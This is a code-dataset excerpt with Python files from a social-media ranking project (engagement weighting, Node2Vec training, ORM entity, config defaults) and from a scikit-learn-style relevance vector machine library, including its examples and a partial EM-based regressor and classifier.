repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
moff4/gladius | logic/rank/wr.py | <filename>logic/rank/wr.py
#!/usr/bin/env python3
import sys
import time
import numpy.linalg
import numpy.random
import random
# Empirical hourly activity weights used as the default spread for
# interpolice(): each entry is [hour, weight].  The same 24-hour pattern
# (peak 108.0, trough 16.0) is repeated for hours -24..48 so that
# interpolation near the day boundaries has enough surrounding points.
# NOTE(review): the weight values look hand-tuned; their source is not
# visible in this file -- confirm before changing.
VK_SPREAD = [
    [-24, 58.0], [-23, 36.0], [-22, 20.0], [-21, 17.0],
    [-20, 16.0], [-19, 19.0], [-18, 24.0], [-17, 36.0],
    [-16, 45.0], [-15, 55.0], [-14, 60.0], [-13, 70.0],
    [-12, 75.0], [-11, 79.0], [-10, 83.0], [-9, 87.0],
    [-8, 92.0], [-7, 96.0], [-6, 100.0], [-5, 105.0],
    [-4, 108.0], [-3, 105.0], [-2, 96.0], [-1, 80.0],
    [0, 58.0], [1, 36.0], [2, 20.0], [3, 17.0],
    [4, 16.0], [5, 19.0], [6, 24.0], [7, 36.0],
    [8, 45.0], [9, 55.0], [10, 60.0], [11, 70.0],
    [12, 75.0], [13, 79.0], [14, 83.0], [15, 87.0],
    [16, 92.0], [17, 96.0], [18, 100.0], [19, 105.0],
    [20, 108.0], [21, 105.0], [22, 96.0], [23, 80.0],
    [24, 58.0], [25, 36.0], [26, 20.0], [27, 17.0],
    [28, 16.0], [29, 19.0], [30, 24.0], [31, 36.0],
    [32, 45.0], [33, 55.0], [34, 60.0], [35, 70.0],
    [36, 75.0], [37, 79.0], [38, 83.0], [39, 87.0],
    [40, 92.0], [41, 96.0], [42, 100.0], [43, 105.0],
    [44, 108.0], [45, 105.0], [46, 96.0], [47, 80.0],
    [48, 58.0],
]
def WR_params(date, f=1):
    """
    Build the three control points consumed by the WeightRandom class.

    Converts *date* (a unix timestamp) to seconds since local midnight
    and returns [[x0, 0.0], [x1, 3200], [x2, 1850]] where the peak x1
    lies 70 minutes after x0 and x2 lies two hours after x0, both
    offsets divided by the speed-up factor *f*.
    """
    local = time.localtime(date)
    midnight_offset = (local.tm_hour * 60 + local.tm_min) * 60 + local.tm_sec
    return [
        [midnight_offset, 0.0],
        [midnight_offset + (3600 + 600) / f, 3200],
        [midnight_offset + (2 * 3600) / f, 1850],
    ]
class PyWeightRandom:
    """
    Pure-Python weighted random generator.

    Built from a post's publish time, it models the intensity with which
    users create reposts/likes over the 24 hours after publication:
    a parabolic ramp-up to a peak followed by a hyperbolic decay.
    """
    def __init__(self, data):
        """
        data = [
            [ x0 , y0 ] ,  - left zero point of the parabola
            [ x1 , y1 ] ,  - the peak
            [ x2 , y2 ]    - point located ( x1-x0 ) after the peak
        ]
        endpoint = number of seconds that:
            1. > x0
            2. <= x0 + 86000
        """
        # p = [ x0 , x1 , y1 , y2]
        self.p = [data[0][0], data[1][0], data[1][1], data[2][1]]
        # Solve for the parabola a*x^2 + b*x + c through
        # (x0, 0), (x1, y1) and (2*x1 - x0, 0).
        mm = [
            [self.p[0]**2, self.p[0], 1],
            [self.p[1]**2, self.p[1], 1],
            [(2 * self.p[1] - self.p[0])**2, (2 * self.p[1] - self.p[0]), 1]
        ]
        abc = list(numpy.linalg.solve(mm, [0, self.p[2], 0]))
        self.a = abc[0]
        self.b = abc[1]
        self.c = abc[2]
        # Solve for the decay tail d / (x + k) matching y1 at x1
        # and y2 at 2*x1 - x0.
        mm = [
            [1.0, -self.p[2]],
            [1.0, -self.p[3]]
        ]
        dk = numpy.linalg.solve(mm, [self.p[2] * self.p[1], self.p[3] * (2 * self.p[1] - self.p[0])])
        self.d = dk[0]
        self.k = dk[1]
        self.data = {}
        self._fill()
        # Per-second weights over a full day and their normalised form.
        self._weight = list(self.data.values())
        self._m = sum(self._weight)
        self.elem = list(self.data.keys())
        self.weight = list(map(lambda x: float(x) / float(self._m), self._weight))
    # ==========================================================================
    # INTERNAL METHODS
    # ==========================================================================
    def spread(self, x):
        """
        Distribution density of the random variable at second *x*.

        p = [
            0 - start point (float)
            1 - X where max of Y (float)
            2 - max of Y (float)
            3 - Y when x = ( 2*p[1]-p[0] )
        ]
        """
        # NOTE(review): the parabola branch uses p[0]+1 / p[1]+1 bounds
        # while the decay branch starts at p[1]; the one-second shift is
        # presumably meant to skip the exact zero at x0 -- confirm.
        if self.p[0] + 1 <= x <= self.p[1] + 1:
            res = self.a * (x**2) + self.b * x + self.c
        elif self.p[1] <= x:
            res = (self.d / (x + self.k))
        else:
            # Before the start point: wrap around by one day.
            res = self.spread(x + 3600 * 24)
        return res
    def _fill(self):
        """
        should fill self.data with values of spread function in interesting range
        return None
        """
        # Sample spread() once per second for 24 hours starting at x0,
        # keyed by the second-of-day (i % 86400).
        end = 86400 + (i := self.p[0])
        while i < end:
            self.data[i % 86400] = self.spread(i)
            i += 1
    def random(self, y=1):
        """
        return random number using spread function
        """
        if y <= 1:
            # Single sample: inverse-CDF walk over the normalised weights.
            x = random.random()
            i = 0
            while x > 0.0:
                x -= self.weight[i]
                i += 1
            return [i - 1]
        else:
            # y samples: split the total mass into y equal chunks and
            # record the residual weight at each chunk boundary.
            # NOTE(review): this branch returns weight residuals rather
            # than indices like the y<=1 branch -- verify callers.
            k = float(self._m) / float(y)
            x = []
            y = k
            for i in range(len(ww := list(self._weight))):
                while ww[i] > 0.0:
                    y -= (z := min(y, ww[i]))
                    ww[i] -= z
                    if y <= 0.0:
                        y = k
                        x.append(ww[i])
            return x
    def destruct(self):
        """
        really do nothing (here)
        """
        pass
    def will_be(self, count_now, now):
        """
        predict how many obj will be in 24 hours
        """
        def en(_time):
            # Seconds since local midnight for timestamp *_time*.
            tm = time.localtime(_time)
            return (tm.tm_hour * 60 + tm.tm_min) * 60 + tm.tm_sec
        if (now := en(now)) < self.p[0]:
            now += 24 * 3600
        # NOTE(review): the filter compares list *indices* i against
        # second-of-day values p[0]/now; this only lines up when the
        # weights are indexed from second 0 -- verify.
        return (
            (count_now * sum(self.weight) / s)
            if (
                s := sum(
                    self.weight[i]
                    for i in range(len(self.weight))
                    if self.p[0] < i < now
                )
            ) > 0 else
            0
        )
def py__interpolice(ff, x):
    """
    Lagrange interpolation of *ff* at point *x*, restricted to the
    points whose abscissa lies within 12 units of *x*.

    USE ONLY BY INTERPOLICE
    """
    window = [point for point in ff if -12 < (point[0] - x) < 12]
    total = 0.0
    for xi, yi in window:
        basis = 1.0
        for xj, _ in window:
            if xi != xj:
                basis *= (x - xj) / (xi - xj)
        total += basis * yi
    return total
# Prefer the C extension implementations on POSIX platforms; fall back
# to the pure-Python versions when the extension cannot be imported or
# the '--no-c' command line flag is given.
boo = False
if sys.platform in {'linux', 'darwin'} and '--no-c' not in sys.argv[1:]:
    try:
        from .ext import interpolice as __interpolice
        from .ext import CWeightRandom as WeightRandom
        boo = True
    except Exception:
        pass
if not boo:
    WeightRandom = PyWeightRandom
    __interpolice = py__interpolice
def interpolice(x, ff=None):
    """
    Interpolate the activity spread at hour *x* (13:30 -> 13.5) and
    normalise the result to [0..1].

    ff = [
        [x0 , f(x0)],
        [x1 , f(x1)],
    ]
    Defaults to VK_SPREAD when *ff* is not given.
    """
    if ff is not None:
        peak = float(max(pair[1] for pair in ff))
    else:
        ff = VK_SPREAD
        peak = 108.0  # known maximum weight in VK_SPREAD
    return __interpolice(ff, x) / peak
|
moff4/gladius | tasks/node2vec.py |
from typing import Any
from node2vec.edges import HadamardEmbedder
from node2vec import Node2Vec
from conf import conf
from logic.graph import GRAPH
# This task takes no CLI arguments; ARGS is kept for interface parity
# with other tasks.
ARGS = {}
task_description = 'train Node2Vec; args: %s' % ', '.join(list(ARGS))
def train(model_filename: str, embeding_filename: str, edges_filename: str, **params: Any):
    """
    Train a Node2Vec model on the shared GRAPH and persist the results.

    model_filename    -- path for the saved gensim model
    embeding_filename -- path for the node embeddings (word2vec format)
    edges_filename    -- path for the Hadamard edge embeddings
    params            -- accepted for config compatibility; currently unused
    """
    graph = GRAPH.graph
    # NOTE(review): hyper-parameters are hard-coded; presumably tuned
    # for this graph -- confirm before reusing elsewhere.
    node2vec = Node2Vec(graph, dimensions=64, walk_length=30, num_walks=200, workers=8)
    model = node2vec.fit(window=10, min_count=1, batch_words=4)
    model.wv.save_word2vec_format(embeding_filename)
    model.save(model_filename)
    # Edge embeddings as the Hadamard product of node embeddings.
    edges_embs = HadamardEmbedder(keyed_vectors=model.wv)
    edges_kv = edges_embs.as_keyed_vectors()
    edges_kv.save_word2vec_format(edges_filename)
def start():
    """Task entry point: train with settings from conf; Ctrl-C aborts quietly."""
    try:
        train(**conf.node2vec)
    except KeyboardInterrupt:
        ...
|
moff4/gladius | db/post.py | <reponame>moff4/gladius<gh_stars>0
from pony import orm
from conf import conf
class Post(conf.sql.Entity):
    """Pony ORM entity describing a post and its engagement counters."""
    # Composite (schema, table) name.
    _table_ = ('hashtag', 'post')
    post_id = orm.PrimaryKey(str)
    post_date = orm.Required(int)  # presumably a unix publish timestamp -- confirm
    views = orm.Required(int)
    likes = orm.Required(int)
    reposts = orm.Required(int)
    timestamp = orm.Required(int)  # NOTE(review): distinct from post_date; likely crawl time -- verify
    from_group = orm.Required(bool, nullable=True)
    tags = orm.Set('PostTag')
|
moff4/gladius | conf/__init__.py | <reponame>moff4/gladius
from pony import orm
from k2.utils.autocfg import AutoCFG
# Each private config section is optional: fall back to an empty dict
# when conf/private.py does not provide it, so the defaults below apply.
try:
    from .private import aeon
except ImportError:
    aeon = {}
try:
    from .private import db
except ImportError:
    db = {}
try:
    from .private import rank
except ImportError:
    rank = {}
try:
    from .private import api
except ImportError:
    api = {}
try:
    from .private import graph
except ImportError:
    graph = {}
# Application configuration: values from conf/private.py take priority,
# update_missing() fills in the defaults below.
conf = AutoCFG(
    {
        'aeon': AutoCFG(aeon).update_missing(
            {
                'use_ssl': False,
                'port': 8080,
                'https_port': 8081,
                'host': '',
                'ssl': None,
                'ssl_handshake_timeout': None,
                'site_dir': './var/',
                'pws_secret': 'pws_secret',
                'request': {
                    'request_header': 'x-user-id',
                    'protocol': {
                        'allowed_methods': {'GET', 'POST'},
                    }
                },
            },
        ),
        'db': AutoCFG(db).update_missing(
            {
                'provider': 'mysql',
                'host': None,
                'port': None,
                'user': None,
                # No default credential: must be supplied via
                # conf/private.py (was a redacted placeholder that made
                # this file a SyntaxError).
                'passwd': None,
                'db': None,
            },
        ),
        'rank': AutoCFG(rank).update_missing(
            {
                'quality_precision': 1000.0,
                'proc_num': 4,
            },
        ),
        'graph': AutoCFG(graph).update_missing(
            {
                'file': 'graph.dump',
                'proc_num': 4,
            },
        ),
        # NOTE(review): node2vec defaults are merged onto the *graph*
        # private section -- looks like a copy-paste of the block above;
        # confirm whether a dedicated private node2vec section was meant.
        'node2vec': AutoCFG(graph).update_missing(
            {
                'model_filename': 'model.n2v',
                'embeding_filename': 'embed.n2v',
                'edges_filename': 'edges.n2v',
            }
        ),
        'api': AutoCFG(api).update_missing(
            {
                'secret': '0123456789',
                'cache_dump_enable': True,
                'cache_dump_file': 'cache.dump',
            },
        ),
    }
)
# Shared database handle used by all Pony ORM entities (see db/*.py).
conf.sql = orm.Database(**conf.db)
|
moff4/gladius | tasks/shell.py |
import IPython
from pony import orm
task_description = 'run shell'
# Open an interactive IPython shell inside a Pony ORM db_session so
# database entities can be queried directly from the prompt.
@orm.db_session
def start():
    """Drop into an interactive IPython shell wrapped in a db_session."""
    IPython.embed()
|
Mind-the-Pineapple/sklearn-rvm | examples/rvm_for_regression.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
RVM for regression
=========================================================
Based on https://github.com/ctgk/PRML/blob/master/notebooks/ch07_Sparse_Kernel_Machines.ipynb
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn_rvm import EMRVR
def create_toy_data(n=20):
    """Return *n* points of a noisy sine: x in [0, 1], t = sin(2*pi*x) + N(0, 0.1)."""
    x = np.linspace(0, 1, n)
    noise = np.random.normal(scale=0.1, size=n)
    t = np.sin(2 * np.pi * x) + noise
    return x, t
# Fit an RVR with an RBF kernel on noisy sine data, then plot the
# predictive mean, a one-standard-deviation band, and the relevance
# vectors picked by the model.
x_train, y_train = create_toy_data(n=50)
x = np.linspace(0, 1, 100)
model = EMRVR(kernel="rbf")
model.fit(x_train[:, None], y_train)
y, y_std = model.predict(x[:, None], return_std=True)
plt.scatter(x_train, y_train, facecolor="none", edgecolor="g", label="training")
plt.scatter(x[model.relevance_], y[model.relevance_], s=100, facecolor="none", edgecolor="b", label="relevance vector")
plt.plot(x[:, None], y, color="r", label="predict mean")
plt.fill_between(x, y - y_std, y + y_std, color="pink", alpha=0.2, label="predict std.")
plt.legend(loc="best")
plt.show()
|
Mind-the-Pineapple/sklearn-rvm | examples/plot_iris_rvc.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=====================================================================
Example of a Relevance Vector Classifier using the Iris Dataset
=====================================================================
Based on https://scikit-learn.org/stable/auto_examples/svm/plot_iris_svc.html
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets
from sklearn_rvm import EMRVC
def make_meshgrid(x, y, h=.02):
    """Create a mesh of points to plot in.

    Parameters
    ----------
    x: data to base x-axis meshgrid on
    y: data to base y-axis meshgrid on
    h: stepsize for meshgrid, optional

    Returns
    -------
    xx, yy : ndarray
    """
    # Pad the data range by one unit on each side before gridding.
    pad = 1
    x_range = np.arange(x.min() - pad, x.max() + pad, h)
    y_range = np.arange(y.min() - pad, y.max() + pad, h)
    return np.meshgrid(x_range, y_range)
def plot_contours(ax, clf, xx, yy, **params):
    """Plot the decision boundaries for a classifier.

    Parameters
    ----------
    ax: matplotlib axes object
    clf: a classifier
    xx: meshgrid ndarray
    yy: meshgrid ndarray
    params: dictionary of params to pass to contourf, optional
    """
    # Predict a hard label for every grid point; the probability-based
    # variant is kept below for reference.
    #Z = clf.predict_proba(np.c_[xx.ravel(), yy.ravel()])[:, 1]
    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
    Z = Z.reshape(xx.shape)
    out = ax.contourf(xx, yy, Z, **params)
    return out
# import some data to play with
iris = datasets.load_iris()
# Take the first two features.
X = iris.data[:, :2]
y = iris.target
models = (EMRVC(kernel='linear'),
          EMRVC(kernel='rbf'),
          EMRVC(kernel='sigmoid'))
models = (clf.fit(X, y) for clf in models)
# One title per model: with only two titles, zip() silently dropped the
# sigmoid model from the plot.
titles = ('RVC with linear kernel',
          'RVC with RBF kernel',
          'RVC with sigmoid kernel')
# Set up a 1x3 grid for plotting, one axis per fitted model.
fig, sub = plt.subplots(1, 3)
plt.subplots_adjust(wspace=0.4, hspace=0.4)
X0, X1 = X[:, 0], X[:, 1]
xx, yy = make_meshgrid(X0, X1)
for clf, title, ax in zip(models, titles, sub.flatten()):
    plot_contours(ax, clf, xx, yy,
                  cmap=plt.cm.coolwarm, alpha=0.8)
    ax.scatter(X0, X1, c=y, cmap=plt.cm.coolwarm, s=20, edgecolors='k')
    ax.set_xlim(xx.min(), xx.max())
    ax.set_ylim(yy.min(), yy.max())
    ax.set_xlabel('Sepal length')
    ax.set_ylabel('Sepal width')
    ax.set_xticks(())
    ax.set_yticks(())
    ax.set_title(title)
plt.show()
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/em_rvm.py | <filename>sklearn_rvm/em_rvm.py
"""Relevance vector machine using expectation maximization like algorithm.
Based on
--------
https://github.com/JamesRitchie/scikit-rvm
https://github.com/ctgk/PRML/blob/master/prml/kernel/relevance_vector_regressor.py
"""
# Author: <NAME>
# <NAME>
# License: BSD 3 clause
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
import scipy.linalg
from numpy import linalg
from scipy.optimize import minimize
from scipy.special import expit
from sklearn.base import RegressorMixin, BaseEstimator, ClassifierMixin
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.multiclass import OneVsRestClassifier
from sklearn.utils.validation import check_X_y, check_is_fitted, check_array
class BaseRVM(BaseEstimator, metaclass=ABCMeta):
    """Basic class for Relevance Vector Machine.

    Stores the hyper-parameters shared by EMRVR and EMRVC and provides
    the kernel computation and basis-pruning helpers used by both.
    """
    @abstractmethod
    def __init__(self, kernel, degree, gamma, coef0, tol, threshold_alpha,
                 beta_fixed, alpha_max, init_alpha, bias_used,
                 max_iter, compute_score, epsilon, verbose):
        # Reject gamma == 0 early: it would make the kernel degenerate.
        if gamma == 0:
            msg = ("The gamma value of 0.0 is invalid. Use 'auto' to set"
                   " gamma to a value of 1 / n_features.")
            raise ValueError(msg)
        # sklearn convention: store parameters verbatim, no derivation.
        self.kernel = kernel
        self.degree = degree
        self.gamma = gamma
        self.coef0 = coef0
        self.tol = tol
        self.threshold_alpha = threshold_alpha
        self.beta_fixed = beta_fixed
        self.alpha_max = alpha_max
        self.init_alpha = init_alpha
        self.bias_used = bias_used
        self.max_iter = max_iter
        self.compute_score = compute_score
        self.epsilon = epsilon
        self.verbose = verbose
    def _get_kernel(self, X, Y=None):
        """Calculate kernelised features."""
        if callable(self.kernel):
            # NOTE(review): self.kernel_params is never assigned anywhere
            # in this class; a callable kernel would raise AttributeError
            # here -- verify.
            params = self.kernel_params or {}
        else:
            params = {"gamma": self._gamma,
                      "degree": self.degree,
                      "coef0": self.coef0}
        return pairwise_kernels(X, Y, metric=self.kernel,
                                filter_params=True, **params)
    def _prune(self):
        """Remove basis functions based on alpha values."""
        # Keep basis functions whose alpha is below the threshold; if
        # everything would be pruned, keep the first one.
        keep_alpha = self.alpha_ < self.threshold_alpha
        if not np.any(keep_alpha):
            keep_alpha[0] = True
        if self.bias_used:
            # Column 0 is the bias; relevance vectors start at column 1.
            if not keep_alpha[0]:
                self.bias_used = False
            if self.kernel != "precomputed":
                self.relevance_vectors_ = self.relevance_vectors_[
                    keep_alpha[1:]]
            self.relevance_ = self.relevance_[keep_alpha[1:]]
        else:
            if self.kernel != "precomputed":
                self.relevance_vectors_ = self.relevance_vectors_[keep_alpha]
            self.relevance_ = self.relevance_[keep_alpha]
        # Shrink every per-basis state array consistently.
        self.alpha_ = self.alpha_[keep_alpha]
        self._alpha_old = self._alpha_old[keep_alpha]
        self.gamma_ = self.gamma_[keep_alpha]
        self.Phi_ = self.Phi_[:, keep_alpha]
        self.Sigma_ = self.Sigma_[np.ix_(keep_alpha, keep_alpha)]
        self.mu_ = self.mu_[keep_alpha]
    @property
    def _pairwise(self):
        # sklearn flag: X is a precomputed kernel matrix.
        return self.kernel == "precomputed"
    @property
    def coef_(self):
        # Input-space weights are only meaningful for a linear kernel.
        if self.kernel != "linear":
            raise AttributeError(
                "coef_ is only available when using a linear kernel")
        coef = self._get_coef()
        return coef
    def _get_coef(self):
        "Calculate coefficients."
        # Project the kernel-space weights back to input space.
        return np.dot(self.mu_, self.relevance_vectors_)
class EMRVR(RegressorMixin, BaseRVM):
"""Relevance Vector Regressor.
Implementation of the relevance vector regressor using the algorithm
based on expectation maximization.
Parameters
----------
kernel : string, optional (default="rbf")
Specifies the kernel type to be used in the algorithm.
It must be one of "linear", "poly", "rbf", "sigmoid" or "precomputed".
If none is given, "rbf" will be used.
degree : int, optional (default=3)
Degree of the polynomial kernel function ("poly"). Ignored by all other
kernels.
gamma : {"auto", "scale"} or float, optional (default="auto")
Kernel coefficient for "rbf", "poly" and "sigmoid".
Current default is "auto" which uses 1 / n_features,
if ``gamma="scale"`` is passed then it uses 1 / (n_features * X.var())
as value of gamma.
coef0 : float, optional (default=0.0)
Independent term in kernel function. It is only significant in "poly"
and "sigmoid".
tol : float, optional (default=1e-6)
Tolerance for stopping criterion.
threshold_alpha : float, optional (default=1e5)
Threshold for alpha selection criterion.
beta_fixed : {"not_fixed"} or float, optional (default="not_fixed")
Fixed value for beta. If "not_fixed" selected, the beta is updated at
each iteration.
alpha_max : int, optional (default=1e9)
Basis functions associated with alpha value beyond this limit will be
purged. Must be a positive and big number.
init_alpha : array-like of shape (n_sample) or None, optional (default=None)
Initial value for alpha. If None is selected, the initial value of
alpha is defined by init_alpha = 1 / M ** 2.
bias_used : boolean, optional (default=False)
Specifies if a constant (a.k.a. bias) should be added to the decision
function.
max_iter : int, optional (default=5000)
Hard limit on iterations within solver.
compute_score : boolean, optional (default=False)
Specifies if the objective function is computed at each step of the model.
verbose : boolean, optional (default=False)
Enable verbose output.
Attributes
----------
relevance_ : array-like, shape (n_relevance)
Indices of relevance vectors.
relevance_vectors_ : array-like, shape (n_relevance, n_features)
Relevance vectors (equivalent to X[relevance_]).
alpha_ : array-like, shape (n_samples)
Estimated alpha values.
gamma_ : array-like, shape (n_samples)
Estimated gamma values.
Phi_ : array-like, shape (n_samples, n_features)
Estimated phi values.
Sigma_ : array-like, shape (n_samples, n_features)
Estimated covariance matrix of the weights.
mu_ : array-like, shape (n_relevance, n_features)
Coefficients of the regression model (mean of posterior distribution)
coef_ : array, shape (n_class * (n_class-1) / 2, n_features)
Coefficients of the regression model (mean of posterior distribution).
Weights assigned to the features. This is only available in the case
of a linear kernel. `coef_` is a readonly property derived from `mu`
and `relevance_vectors_`.
See Also
--------
EMRVC
Relevant Vector Machine for Classification.
Notes
-----
**References:**
`The relevance vector machine.
<http://www.miketipping.com/sparsebayes.htm>`__
"""
def __init__(self, kernel="rbf", degree=3, gamma="auto_deprecated",
             coef0=0.0, tol=1e-3, threshold_alpha=1e9,
             beta_fixed="not_fixed", alpha_max=1e10, init_alpha=None,
             bias_used=True, max_iter=5000, compute_score=False,
             epsilon=1e-08, verbose=False):
    # All hyper-parameters are stored verbatim by BaseRVM.__init__
    # (sklearn convention: no validation or derivation in __init__,
    # except the gamma == 0 check performed by the base class).
    super().__init__(
        kernel=kernel, degree=degree, gamma=gamma, coef0=coef0, tol=tol,
        threshold_alpha=threshold_alpha, beta_fixed=beta_fixed,
        alpha_max=alpha_max, init_alpha=init_alpha, bias_used=bias_used,
        max_iter=max_iter, compute_score=compute_score, epsilon=epsilon,
        verbose=verbose)
def compute_marginal_likelihood(self, upper_inv, ed, n_samples, y):
    """Calculate marginal likelihood.

    upper_inv : inverse of the upper-triangular Cholesky factor of the
        Hessian (its diagonal gives the log-determinant).
    ed : sum of squared prediction errors.
    n_samples : number of training samples.
    y : targets.  NOTE(review): unused in the body -- kept for
        call-site compatibility.
    """
    dataLikely = (n_samples * np.log(self.beta_) - self.beta_ * ed) / 2
    # log|H| = -2 * sum(log(diag(inv(U)))) since H = U^T U.
    logdetH = -2 * np.sum(np.log(np.diag(upper_inv)))
    marginal = dataLikely - 0.5 * (
        logdetH - np.sum(np.log(self.alpha_)) + (
            self.mu_ ** 2).T @ self.alpha_)
    return marginal
def fit(self, X, y):
    """Fit the RVR model according to the given training data.

    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
        Training vectors.
    y : array-like, shape (n_samples,)
        Target values.

    Returns
    -------
    self : object
    """
    X, y = check_X_y(X, y, y_numeric=True, ensure_min_samples=2,
                     dtype="float64")
    if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
        raise ValueError("X.shape[0] should be equal to X.shape[1]")
    # Resolve the effective gamma (mirrors sklearn's SVM deprecation path).
    if self.gamma in ("scale", "auto_deprecated"):
        X_var = X.var()
        if self.gamma == "scale":
            if X_var != 0:
                self._gamma = 1.0 / (X.shape[1] * X_var)
            else:
                self._gamma = 1.0
        else:
            kernel_uses_gamma = (not callable(self.kernel) and self.kernel
                                 not in ("linear", "precomputed"))
            if kernel_uses_gamma and not np.isclose(X_var, 1.0):
                # NOTE: when deprecation ends we need to remove explicitly
                # setting `gamma` in examples (also in tests). See
                # https://github.com/scikit-learn/scikit-learn/pull/10331
                # for the examples/tests that need to be reverted.
                warnings.warn("The default value of gamma will change "
                              "from 'auto' to 'scale' in version 0.22 to "
                              "account better for unscaled features. Set "
                              "gamma explicitly to 'auto' or 'scale' to "
                              "avoid this warning.", FutureWarning)
            self._gamma = 1.0 / X.shape[1]
    elif self.gamma == "auto":
        self._gamma = 1.0 / X.shape[1]
    else:
        self._gamma = self.gamma
    self.scores_ = list()
    n_samples = X.shape[0]
    self.Phi_ = self._get_kernel(X)
    # Scale Phi based on PRoNTO implementation
    # http://www.mlnl.cs.ucl.ac.uk/pronto/
    self._scale = np.sqrt(np.sum(self.Phi_) / n_samples ** 2)
    self.Phi_ = self.Phi_ / self._scale
    if self.bias_used:
        self.Phi_ = np.hstack((np.ones((n_samples, 1)), self.Phi_))
    M = self.Phi_.shape[1]
    if self.init_alpha is None:  # was `== None`; identity test is correct
        self.init_alpha = 1 / M ** 2
    self.relevance_ = np.array(range(n_samples))
    if self.kernel != "precomputed":
        self.relevance_vectors_ = X
    else:
        self.relevance_vectors_ = None
    # Initialize beta (1 / sigma squared)
    if self.beta_fixed == "not_fixed":
        sigma_squared = (max(self.epsilon, np.std(y) * 0.1) ** 2)
        self.beta_ = 1 / sigma_squared
    else:
        self.beta_ = self.beta_fixed
    self.alpha_ = self.init_alpha * np.ones(M)
    self._alpha_old = self.alpha_.copy()
    for i in range(self.max_iter):
        A = np.diag(self.alpha_)
        hessian = self.beta_ * self.Phi_.T @ self.Phi_ + A
        # Calculate Sigma and mu via a Cholesky decomposition for
        # efficiency (ref: https://arxiv.org/abs/1111.4144); fall back
        # to a (pseudo-)inverse when the Hessian is not positive definite.
        chol_fail = False
        try:
            upper = scipy.linalg.cholesky(hessian)
        except linalg.LinAlgError:
            warnings.warn("Hessian not positive definite")
            chol_fail = True
        if chol_fail:
            try:
                self.Sigma_ = np.linalg.inv(hessian)
            except linalg.LinAlgError:
                warnings.warn("Using Pseudo-Inverse")
                self.Sigma_ = np.linalg.pinv(hessian)
            self.mu_ = self.beta_ * (self.Sigma_ @ self.Phi_.T @ y)
            sigma_diag = np.diag(self.Sigma_)
        else:
            try:
                upper_inv = np.linalg.inv(upper)
            except linalg.LinAlgError:
                warnings.warn("Using Pseudo-Inverse")
                upper_inv = np.linalg.pinv(upper)
            self.Sigma_ = np.dot(upper_inv, upper_inv.conj().T)
            self.mu_ = (upper_inv @ (
                upper_inv.conj().T @ self.Phi_.T @ y)) * self.beta_
            # Equivalent to np.diag(self.Sigma_) without forming it twice.
            sigma_diag = np.sum(upper_inv ** 2, axis=1)
        # Well-determinedness parameters (gamma)
        self.gamma_ = 1 - self.alpha_ * sigma_diag
        # Alpha re-estimation: MacKay-style update given in the
        # original NIPS paper.
        self.alpha_ = np.maximum(self.gamma_, self.epsilon) / (
            self.mu_ ** 2) + self.epsilon
        # Prediction error.  Computed unconditionally: previously it was
        # only defined inside the beta update, leaving `ed` unbound when
        # beta_fixed was numeric and compute_score=True.
        ed = np.sum((y - self.Phi_ @ self.mu_) ** 2)
        if self.beta_fixed == "not_fixed":
            self.beta_ = max((n_samples - np.sum(self.gamma_)),
                             self.epsilon) / ed + self.epsilon
        # Marginal likelihood is only available on the Cholesky path.
        ll = None
        if not chol_fail and self.compute_score:
            ll = self.compute_marginal_likelihood(upper_inv, ed,
                                                  n_samples, y)
            self.scores_.append(ll)
        if self.verbose:
            print("Iteration: {}".format(i))
            print("Alpha: {}".format(self.alpha_))
            print("Beta: {}".format(self.beta_))
            print("Gamma: {}".format(self.gamma_))
            print("mu: {}".format(self.mu_))
            print("Relevance Vectors: {}".format(self.relevance_.shape[0]))
            # Guarded on `ll` too: previously this printed an unbound
            # name after a Cholesky failure.
            if self.compute_score and ll is not None:
                print("Marginal Likelihood: {}".format(ll))
            print()
        # Prune based on large values of alpha
        self._prune()
        # Terminate if the largest alpha change is smaller than threshold
        delta = np.amax(
            np.absolute(np.log(self.alpha_ + self.epsilon) - np.log(
                self._alpha_old + self.epsilon)))
        if delta < self.tol and i > 1:
            break
        self._alpha_old = self.alpha_.copy()
    # sklearn contract: fit must return the estimator (was missing).
    return self
def predict(self, X, return_std=False):
    """Predict using the RVR model.

    In addition to the mean of the predictive distribution, its
    standard deviation can also be returned.

    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
        Query points to be evaluate.
    return_std : bool, optional (default=False)
        If True, the standard-deviation of the predictive distribution at
        the query points is returned along with the mean.

    Returns
    -------
    y_mean : array, shape (n_samples, n_output_dims)
        Mean of predictive distribution at query points
    y_std : array, shape (n_samples,), optional
        Standard deviation of predictive distribution at query points.
        Only returned when return_std is True.
    """
    check_is_fitted(self, ["relevance_", "mu_", "Sigma_"])
    X = check_array(X)
    n_samples = X.shape[0]
    if self.kernel != "precomputed":
        K = self._get_kernel(X, self.relevance_vectors_)
    else:
        # Precomputed kernel: select the columns of the surviving
        # relevance vectors.
        K = X[:, self.relevance_]
    # Apply the same scaling (and optional bias column) as in fit().
    K = K / self._scale
    if self.bias_used:
        K = np.hstack((np.ones((n_samples, 1)), K))
    y_mean = K @ self.mu_
    if return_std is False:
        return y_mean
    else:
        # Predictive variance = noise variance + model uncertainty.
        err_var = (1 / self.beta_) + K @ self.Sigma_ @ K.T
        y_std = np.sqrt(np.diag(err_var))
        return y_mean, y_std
class EMRVC(BaseRVM, ClassifierMixin):
"""Relevance Vector Classifier.
Implementation of <NAME>"s Relevance Vector Machine for
classification using the scikit-learn API.
The multiclass support is handled according to a one-vs-rest scheme.
For details on the precise mathematical formulation of the provided
kernel functions and how `gamma`, `coef0` and `degree` affect each
other, see the corresponding section in the narrative documentation:
:ref:`svm_kernels`.
Parameters
----------
n_iter_posterior : int, optional (default=50)
Number of iterations to calculate posterior.
kernel : string, optional (default="rbf")
Specifies the kernel type to be used in the algorithm.
It must be one of "linear", "poly", "rbf", "sigmoid" or ‘precomputed’.
If none is given, "rbf" will be used.
degree : int, optional (default=3)
Degree of the polynomial kernel function ("poly"). Ignored by all other
kernels.
gamma : float, optional (default="auto")
